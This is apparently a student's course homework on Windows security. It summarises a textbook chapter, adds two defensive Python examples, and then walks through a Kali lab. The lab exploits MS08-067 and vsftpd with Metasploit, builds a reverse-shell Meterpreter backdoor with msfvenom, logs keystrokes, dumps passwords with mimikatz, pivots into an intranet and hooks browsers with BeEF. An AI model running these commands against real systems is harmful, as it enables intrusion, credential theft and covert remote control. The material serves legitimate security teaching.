2017-2018-2 20179215 "Network Attack and Defense Practice" Week 7 Homework

2016-2017-2 20179215 "Network Attack and Defense Practice" Week 7 Homework

Textbook learning content summary

Chapter 7. Windows OS Security Attacks and Defenses

Security Architecture and Mechanism of Windows Operating System

  • The Windows security architecture
    implements a basic object security model based on the Reference Monitor model. Its core is the SRM (Security Reference Monitor) in the kernel and the LSASS security service in user mode.

  • Windows authentication mechanisms
    are divided into three categories: users, user groups, and computers. Each security principal is identified by a globally unique SID security identifier both in time and space.
    Windows user passwords are encrypted and stored in the SAM or Active Directory AD. The local user account password information is encrypted with an irreversible 128-bit random key Hash and stored in the SAM file.
    The Windows process, the GINA graphical login window, and the LSASS service cooperate to complete the local authentication process.

  • Windows authorization and access control mechanism
    The Windows authorization and access control mechanism is based on the reference monitor model and is implemented by the SRM module in the kernel and the LSASS service in user mode.
    Windows abstracts every resource that needs protection into an object, and each object is associated with a Security Descriptor (SD) consisting of the following attributes: Owner SID, Group SID, DACL (discretionary access control list), and SACL (system access control list, used for auditing).

  • Windows Security Audit Mechanism
    The system audit policy is defined by the system administrator in the local security policy to determine which events the system records.

  • Other Windows Security Mechanisms
    Windows Security Center integrates the three most critical security measures to protect the safe and stable operation of Windows systems: firewall, automatic patch update, and virus protection. In addition to Security Center, Windows' security features include IPSec encryption and authentication mechanisms, EFS encrypted file systems, Windows file protection mechanisms, and privacy protection and browsing security protection mechanisms provided by the bundled IE browser.
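The authorization bullet above describes the reference-monitor check in one sentence. The following added example (written for this summary, not code from the textbook or from Windows) models that check in Python: an access token carries the user SID and group SIDs, a security descriptor carries an ordered DACL of allow/deny ACEs, and `access_check` walks the ACEs the way the text describes. The SIDs with `S-1-5-21-0-0-0-...` and the four access-mask bits are constructed for illustration; only `S-1-5-32-545` (BUILTIN\Users) is a real well-known SID. The example also goes one step beyond the text with `is_canonical`, which flags a DACL whose allow ACEs precede its deny ACEs, a misordering that lets the deny be bypassed.

```python
# Added example: a simplified model of how the Windows Security Reference
# Monitor evaluates a DACL against an access token. Not the real Windows
# implementation; SIDs and mask bits below are constructed for illustration.
from dataclasses import dataclass, field
from typing import FrozenSet, List, Optional

# Constructed generic rights (bit flags); real Windows masks are object-specific.
READ, WRITE, EXECUTE, DELETE = 0x1, 0x2, 0x4, 0x8

USERS = "S-1-5-32-545"               # real well-known SID: BUILTIN\Users
CONTRACTORS = "S-1-5-21-0-0-0-1001"  # constructed group SID
ALICE = "S-1-5-21-0-0-0-1102"        # constructed user SID (object owner)
BOB = "S-1-5-21-0-0-0-1103"          # constructed user SID (contractor)


@dataclass(frozen=True)
class Ace:
    """One access control entry: allow or deny a set of rights to one SID."""
    kind: str   # "allow" or "deny"
    sid: str
    mask: int


@dataclass
class SecurityDescriptor:
    """Subset of an SD: owner, primary group and the DACL (None = NULL DACL)."""
    owner_sid: str
    group_sid: str
    dacl: Optional[List[Ace]] = field(default_factory=list)


@dataclass(frozen=True)
class Token:
    """Access token: the user's SID plus the SIDs of the groups it belongs to."""
    user_sid: str
    group_sids: FrozenSet[str]


def access_check(sd: SecurityDescriptor, token: Token, requested: int) -> bool:
    """Return True if every bit in `requested` is granted by the DACL.

    Rules modelled:
    - a NULL DACL protects nothing, so every request is granted;
    - an empty DACL grants nothing;
    - ACEs are walked in order; the first deny ACE that names one of the
      token's SIDs and overlaps a still-requested right ends the check;
    - allow ACEs accumulate rights until all requested bits are covered.
    """
    if sd.dacl is None:
        return True
    token_sids = token.group_sids | {token.user_sid}
    remaining = requested
    for ace in sd.dacl:
        if ace.sid not in token_sids:
            continue
        if ace.kind == "deny":
            if ace.mask & remaining:
                return False
        elif ace.kind == "allow":
            remaining &= ~ace.mask
            if remaining == 0:
                return True
    return remaining == 0


def is_canonical(dacl: Optional[List[Ace]]) -> bool:
    """Canonical order places every explicit deny ACE before the allow ACEs.

    A DACL that breaks this order can satisfy a request from an allow ACE
    before the intended deny is reached, which is a misconfiguration worth
    auditing.
    """
    seen_allow = False
    for ace in dacl or []:
        if ace.kind == "allow":
            seen_allow = True
        elif seen_allow:
            return False
    return True


# Constructed object: contractors may not write, Users get read/write/execute,
# only the owner may delete.
EXAMPLE_SD = SecurityDescriptor(ALICE, USERS, [
    Ace("deny", CONTRACTORS, WRITE),
    Ace("allow", USERS, READ | WRITE | EXECUTE),
    Ace("allow", ALICE, DELETE),
])
# Same intent, but the deny ACE was appended after the allow ACE.
NON_CANONICAL_SD = SecurityDescriptor(ALICE, USERS, [
    Ace("allow", USERS, READ | WRITE | EXECUTE),
    Ace("deny", CONTRACTORS, WRITE),
])
ALICE_TOKEN = Token(ALICE, frozenset({USERS}))
BOB_TOKEN = Token(BOB, frozenset({USERS, CONTRACTORS}))

if __name__ == "__main__":
    print("bob write (canonical):", access_check(EXAMPLE_SD, BOB_TOKEN, WRITE))
    print("bob write (non-canonical):", access_check(NON_CANONICAL_SD, BOB_TOKEN, WRITE))
    print("non-canonical DACL flagged:", not is_canonical(NON_CANONICAL_SD.dacl))
```

The second descriptor shows why ACE order matters: the same two entries, reversed, let Bob write because the allow ACE for Users clears the request before the deny for Contractors is examined.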

**Windows remote security attack and defense technology**

Windows remote attack techniques can be divided into: remote password guessing and cracking attacks, attacks on Windows network services, and attacks on Windows clients and users.

  • Windows System Security Vulnerability Life Cycle
    Windows Security Vulnerability Discovery, Exploitation and Patching Process
    Security Vulnerability Public Disclosure Information Base: Several well-known general vulnerability information bases: CVE, NVD, SecurityFocus, OSVDB, etc.
    Penetration testing attack process for a specific target:

    ①Vulnerability scanning test
    ②Find penetration code for discovered vulnerabilities
    ③Perform penetration test

Penetration Testing Using Metasploit Software
Metasploit is completely open source penetration testing software. Adopting an extensible model of development framework and modular components, the Metasploit Framework (MSF) library written in Ruby language serves as the basic core of the entire software, providing a platform for the development and testing of penetration testing components; the modular components are the code that actually implements penetration attacks.
Metasploit provides four different user interaction interfaces: CLI, Console, Web, and GUI, of which the Console terminal is the most commonly used method.

  • Windows Remote Password Guessing and Cracking Attacks

    Remote password guessing

    Remote Password Exchange Communication Eavesdropping and Cracking

    Remote password guessing and cracking prevention measures

  • Windows Network Services Remote Penetration Attack

Windows operating systems open ports 135 (TCP), 137 (UDP), 139 (TCP) and 445 (TCP) by default. The corresponding network services are the MSRPC remote procedure call service, the NetBIOS network basic input/output system service, and the SMB file and printer sharing service.
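A defender's first check against the paragraph above is whether those four default services are actually reachable from the network on a given host. The following added example (written for this summary, not part of the textbook) parses constructed `netstat -ano`-style output and reports every default service on 135/137/139/445 that is bound to a non-loopback address; the sample output, addresses and PIDs are constructed for illustration.

```python
# Added example: audit constructed netstat -ano output for the default Windows
# services (MSRPC, NetBIOS, SMB) that are bound to a non-loopback address and
# therefore reachable from the network. Sample lines are constructed.
from dataclasses import dataclass
from typing import Dict, List, Tuple

DEFAULT_WINDOWS_SERVICES: Dict[Tuple[str, int], str] = {
    ("TCP", 135): "MSRPC endpoint mapper",
    ("UDP", 137): "NetBIOS name service",
    ("TCP", 139): "NetBIOS session service",
    ("TCP", 445): "SMB file and printer sharing",
}

# Constructed netstat -ano output (header plus a mix of exposed, loopback-only
# and unrelated sockets).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:139          0.0.0.0:0              LISTENING       4
  TCP    192.168.14.131:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.14.131:3389    192.168.14.136:50012   ESTABLISHED     1120
  UDP    192.168.14.131:137     *:*                                    4
  UDP    127.0.0.1:1900         *:*                                    1456
"""


@dataclass(frozen=True)
class Finding:
    proto: str
    address: str
    port: int
    service: str
    pid: int


def _is_loopback(address: str) -> bool:
    """True for IPv4 127.x.x.x and IPv6 ::1 (bracketed as netstat prints it)."""
    return address.startswith("127.") or address in ("[::1]", "::1")


def exposed_default_services(netstat_text: str) -> List[Finding]:
    """Return the default Windows services bound to a non-loopback address.

    Only listening TCP sockets count; UDP sockets have no state column, so
    every UDP binding is considered. Header and blank lines are skipped.
    """
    findings: List[Finding] = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        address, port_text = local.rsplit(":", 1)
        port = int(port_text)
        if proto == "TCP" and (len(parts) < 5 or parts[3] != "LISTENING"):
            continue
        service = DEFAULT_WINDOWS_SERVICES.get((proto, port))
        if service is None or _is_loopback(address):
            continue
        findings.append(Finding(proto, address, port, service, int(parts[-1])))
    return findings


def exposed_ports(netstat_text: str) -> List[int]:
    """Convenience view: just the exposed port numbers, in output order."""
    return [f.port for f in exposed_default_services(netstat_text)]


if __name__ == "__main__":
    for f in exposed_default_services(SAMPLE_NETSTAT):
        print(f"{f.proto} {f.address}:{f.port} pid={f.pid} -> {f.service}")
```

On the constructed sample the loopback-only 139 binding and the unrelated 3389 and 1900 sockets are ignored, while 135, 445, 139 on the LAN address and UDP 137 are reported; on a real host the same list tells you which of the default services the host firewall should block from untrusted segments.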

Well-known vulnerabilities and attacks against the NetBIOS network service

Well-known vulnerabilities and attacks against the SMB network service

Well-known vulnerabilities and attacks against the MSRPC network service

Remote penetration attacks against Microsoft network services on Windows systems

Remote penetration attacks against third-party network services on Windows systems

Countermeasures against remote penetration attacks on network services

Class Test - Windows Attack

MS08-067 Vulnerability Introduction

The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and there are already worms that exploit this vulnerability.

The attacker machine used in this experiment is Kali, and the target machine is Windows XP.

Attacker: 192.168.14.136
Target: 192.168.14.131

1. To use Metasploit in Kali, first start the PostgreSQL database service and the Metasploit service.

Kali 2.0 has no metasploit service, so `service metasploit start` does not work.
The way to start MSF with database support in Kali 2.0 is as follows:

  • First start the PostgreSQL database: `/etc/init.d/postgresql start` or `service postgresql start`

  • Initialize the MSF database (critical step!): `msfdb init`

  • Run msfconsole: `msfconsole`

  • View the database connection status in msf: `db_status`

2. Find out whether the ms08-067 vulnerability exists and look at the corresponding information returned.

3. Enter and use the exploit module with the command `use exploit/windows/smb/ms08_067_netapi`; the result after execution is as follows:

4. Set the addresses of the target and attacker machines:

```
set RHOST 192.168.14.131
set LHOST 192.168.14.136
```

5. The next step is to carry out the attack by executing the command `exploit`.

Kali video learning

1. KaliSecurity vulnerability exploitation: retrieval and exploitation of vulnerabilities

1. searchsploit searches by keyword for vulnerability information and the corresponding exploit (exp); for example, `searchsploit wordpress` lists the vulnerabilities and their file paths.

Check out the files listed, for example:

2. ikat automatically opens different exploits and waits for the target to visit.

3. termineter aims to assess the security of smart meters.

2. KaliSecurity vulnerability exploitation: Metasploit basics

Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.

1. Start the service

To use Metasploit in Kali, you need to start the PostgreSQL database service and the Metasploit service first; then you can use the msf database to query exploits and records.

2. Path introduction

The path to msf in Kali is `/usr/share/metasploit-framework`.

3. Basic commands

  • msfpayload: used to generate a payload or shellcode. `msfpayload -l | grep "windows"` can be used to search; the -o option lists the parameters required by the payload.

  • msfencode: the encoder in msf. It was used to bypass AV (antivirus software) in the early days, and is now commonly used to encode the output of msfpayload to avoid the bad characters of an exploit.

  • msfconsole: opens the Metasploit console. Enter `msfconsole` to open msf.

4. Test example: find vulnerabilities and search for exploits: `nmap -sV 192.168.14.136`

It can be seen that the ftp service is open on port 21 and the version is vsftpd 2.3.4. Is there a vulnerability in this version? Searching for `vsftpd` in msf finds a match.

5. Test example: select exploit to view parameters

Check the parameters and find that RHOST has not been set, then set it: `set RHOST 192.168.14.136`

6. Test example: after selecting and configuring the payload, `show options` checks the parameters and shows that there is nothing left to set.

7. Execute the attack

Enter `exploit` to run the attack test; if successful, it returns a shell.
At this point you can view the id, IP address, some file information and so on, and you have obtained the permissions of the target host.

3. KaliSecurity vulnerability exploitation: introduction to Meterpreter

1. Generate the Meterpreter backdoor; open MSF, enable monitoring (select exploit/multi/handler); execute door.exe on the target machine;

```
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.136 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
```
/* Check that your own IP address is 192.168.14.136; LHOST and LPORT are parameters of reverse_tcp and can be viewed in msf (remember to start the service) */

After the setting succeeds it is found that nothing is displayed, because msfpayload has been removed from the new version of Kali. From now on, just use msfvenom, which integrates the functions of msfpayload and msfencode.

So the equivalent command to generate the Meterpreter backdoor is (the output file is given with -o):

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.14.136 LPORT=2333 -i 5 -f exe -o /root/door.exe
```

Generated successfully, move it into the XP system:

2. Open MSF and enable monitoring

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333
```

Modify the listening port:

3. Execute door.exe on the target host

Execute exploit in kali's msf to start listening:

4. View executable commands through the help command:

5. Common command usage

6. Capture the screen; the capture result is saved under /root.

7. Keyboard monitoring

Start the service: `keyscan_dump`
Stop the service: `keyscan_stop`

8. Extension tool: load

9. Load the mimikatz extension tool

Grab the local password plaintext:

One more mimikatz command was found:

To get credentials, enter the command: wdigest

4. KaliSecurity vulnerability exploitation: Metasploit post-penetration testing

After a foothold (springboard) host has been obtained with a certain level of privilege, the next step is to work on the intranet hosts: obtain the specified target information and probe for system vulnerabilities. With the Meterpreter session that msf has already obtained, this series of operations becomes easier.

  1. View the current network card and network segment information with `ifconfig`. Three network cards can be seen: one is the local network card, one is the network card we can reach, and the third has an internal network IP (not reachable directly; try `ping` below).
  2. Add a routing table with `run autoroute -s 10.0.0.1`; msf modules can then attack or scan across network segments. It is quickly added via the autoroute script.
  3. Open a socks proxy by using the auxiliary/server/socks4a module; it can be used by a browser, sqlmap or nmap, so that intranet computers can be reached through the proxy.
  4. Switch between sessions freely with `background` and `session -i`.
  5. Type `run` to see the many commands that can be executed on the meterpreter.
  6. The post-penetration test modules can be seen through `run post/`.
  7. Get intranet information: `run arp_scanner -r 10.0.0.1/24`
  8. Files can also be uploaded, ports forwarded and subsequent tests performed; for example, `upload lcx.exe c:\\` transfers the file to the root directory of the C drive.

5. KaliSecurity vulnerability exploitation: BeEF

Exploiting XSS vulnerabilities needs strong framework support. BeEF is the abbreviation of Browser Exploitation Framework, a penetration tool focused on the browser side.

1. Start BeEF from the command line

Just use the command `beef-xss` directly; open the browser and it will automatically jump to the BeEF login page:

Default username: beef
Password: beef

You can enter the main interface:

2. Assume that the host under test requests to

Test utilization: Enter the URL http://127.0.0.1:3000/demos/basic.html to enter a test page:

In this way, you can see an online host at the left end of the main interface:

3. The hook lasts until the test page is closed; during this period the browser is effectively under control and attack commands can be sent. In the Commands module we can complete many tasks. The four colours represent:

The attack module is usable and highly stealthy

The attack module is usable but poorly stealthy

Whether the module is usable remains to be verified

The attack module is not usable

4. Select the Raw JavaScript module under MISC as the test case

There is a table with a detailed description of the module, as well as some optional parameters. Click Execute to attack:

5. Proxy function

Select the target host, right-click, choose "use as proxy" in the menu, then edit and send the content you want in the Forge Request area of the Rider tab:

After the information is sent, you can see it through the History option. After the transmission is successful, click the corresponding information to display the detailed transmission process:

6. Loading Metasploit into BeEF

BeEF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, some configuration is needed:

Modify the file config.yaml

Open an msfconsole

You can see that there are many more modules that can be used under Metasploit.

Modify the Metasploit line in /usr/share/beef-xss/config.yaml to true:

Restart BeEF and find that many Metasploit attack modules have been loaded:
